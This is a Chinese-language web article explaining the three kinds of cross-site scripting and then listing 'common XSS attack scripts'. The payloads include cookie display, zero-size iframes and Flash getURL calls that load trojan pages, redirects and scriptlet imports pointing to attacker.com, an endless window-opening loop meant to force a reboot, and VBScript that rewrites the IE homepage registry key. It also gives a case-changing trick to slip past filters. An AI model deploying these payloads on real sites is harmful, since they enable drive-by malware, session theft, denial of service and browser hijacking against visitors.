XSS攻擊常識(shí)及常用腳本
一、什么是XSS?
XSS全稱(chēng)是Cross Site Scripting即跨站腳本,當(dāng)目標(biāo)網(wǎng)站目標(biāo)用戶(hù)瀏覽器渲染HTML文檔的過(guò)程中,出現(xiàn)了不被預(yù)期的腳本指令并執(zhí)行時(shí),XSS就發(fā)生了。
二、XSS分類(lèi)
XSS有三類(lèi):反射型XSS(非持久型)、存儲(chǔ)型XSS(持久型)和DOM XSS
反射型XSS
發(fā)出請(qǐng)求時(shí),XSS代碼出現(xiàn)在URL中,作為輸入提交到服務(wù)器端,服務(wù)器端解析后響應(yīng),XSS代碼隨響應(yīng)內(nèi)容一起傳回給瀏覽器,最后瀏覽器解析執(zhí)行XSS代碼。這個(gè)過(guò)程像一次反射,故叫反射型XSS。
存儲(chǔ)型XSS
存儲(chǔ)型XSS和反射型XSS的差別僅在于,提交的代碼會(huì)存儲(chǔ)在服務(wù)器端(數(shù)據(jù)庫(kù),內(nèi)存,文件系統(tǒng)等),下次請(qǐng)求目標(biāo)頁(yè)面時(shí)不用再提交XSS代碼
最典型的例子是留言板X(qián)SS,用戶(hù)提交一條包含XSS代碼的留言存儲(chǔ)到數(shù)據(jù)庫(kù),目標(biāo)用戶(hù)查看留言板時(shí),那些留言的內(nèi)容會(huì)從數(shù)據(jù)庫(kù)查詢(xún)出來(lái)并顯示,瀏覽器發(fā)現(xiàn)有XSS代碼,就當(dāng)做正常的HTML與Js解析執(zhí)行,于是觸發(fā)了XSS攻擊。
DOM XSS
DOM XSS和反射型XSS、存儲(chǔ)型XSS的差別在于DOM XSS的代碼并不需要服務(wù)器參與,觸發(fā)XSS靠的是瀏覽器端的DOM解析,完全是客戶(hù)端的事情。
附常見(jiàn)的XSS攻擊方法
1、這個(gè)應(yīng)該都知道
<script>alert("test")</script> 常用于測(cè)試 是否存在跨站
2、<script>window.alert(document.cookie);</script>
這句代碼將會(huì)彈出壹個(gè)包含有瀏覽者cookie信息的對(duì)話(huà)框,如果用戶(hù)已經(jīng)通過(guò)帳號(hào)登陸網(wǎng)站,在顯示的cookie信息中將會(huì)包含有用戶(hù)的賬戶(hù)名和密碼。
3、<script>window.open('http://www.pete.cn /default.asp','newwindow','width=200,height=200');</script>,當(dāng)用戶(hù)瀏覽該 頁(yè)時(shí),將彈出壹個(gè)高爲(wèi)200,寬爲(wèi)200的網(wǎng)頁(yè)窗口,在其中打開(kāi)的頁(yè)面是http://www.pete.cn/default.asp
4、跨站攻擊的形式是多樣的,不僅可以在網(wǎng)頁(yè)中插入跨站腳本代碼,而且可以在flash文件中插入跨站腳本代碼,實(shí)現(xiàn)跨站攻擊。由于flash文件有較高 的安全性,用戶(hù)通常對(duì)flash文件的警惕性不夠,因此用flash文件進(jìn)行跨站攻擊的成功率很高。如果將這個(gè)含有跨站腳本代碼的flash文件插入到網(wǎng) 頁(yè)中,例如制作成網(wǎng)頁(yè)banner或者廣告,那么中招的用戶(hù)將更多。
flash跨站是通過(guò)在flash文件中插入動(dòng)作腳本來(lái)實(shí)現(xiàn)的,通過(guò)在flash文件“幀”的“動(dòng)作”中插入跨站腳本代碼來(lái)實(shí)現(xiàn)跨站攻擊,其實(shí)現(xiàn)方法入下:
首先運(yùn)行flash文件制作工具flash8.exe,新建壹個(gè)空白的flash文檔。然后選中其中的第壹幀,進(jìn)入界面下方的“動(dòng)作”編輯界面,在Action Script中插入我們的跨站腳本代碼
getURL("http://網(wǎng)頁(yè)木馬地址", "_blank", "GET");
loadMovieNum("http://www.pete.cn/test.swf", 0);
5、<iframe src=http://www.***.com/muma.htm width=0 height=0>< iframe>
這就是 傳說(shuō)中的框架 - - 膜拜吧 還有JS 也可以使用,比框架更隱蔽
6、Refresh到另壹個(gè)頁(yè)面:
<meta http-equiv="refresh" content="1;URL=http://www.attacker.com/another.htm">
7、scriptlet引入另壹個(gè)頁(yè)面:
<object type="text/x-scriptlet" data="http://www.attacker.com/import.htm"></object>
下面來(lái)幾段長(zhǎng)的 但是 記住 要慎用 ??!
1、打開(kāi)無(wú)數(shù)個(gè)瀏覽器窗口,直至CPU超負(fù)荷,非關(guān)機(jī)不可:
<script language="JavaScript"> <!-- while (true) { window.open("URI"); //如果URI就是當(dāng)前頁(yè)本身,那就更具破壞性。 } //--> </script>
2、 修改注冊(cè)表(IE 主頁(yè)):
<script language="VBScript"> Set RegWsh = CreateObject("WScript.Shell") '設(shè)置IE瀏覽器默認(rèn)頁(yè) RegWsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.attacker.com" </script>
有時(shí)候,</script> 可以替換大小寫(xiě) 來(lái)躲過(guò)過(guò)濾
我最后要說(shuō)的壹句話(huà)就是“害人終害己”,切記!
到此這篇關(guān)于XSS攻擊常識(shí)及常用腳本 的文章就介紹到這了,更多相關(guān)XSS 攻擊腳本 內(nèi)容請(qǐng)搜索本站以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持本站!
版權(quán)聲明:本站文章來(lái)源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請(qǐng)保持原文完整并注明來(lái)源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站,禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像,否則將依法追究法律責(zé)任。本站部分內(nèi)容來(lái)源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來(lái),僅供學(xué)習(xí)參考,不代表本站立場(chǎng),如有內(nèi)容涉嫌侵權(quán),請(qǐng)聯(lián)系alex-e#qq.com處理。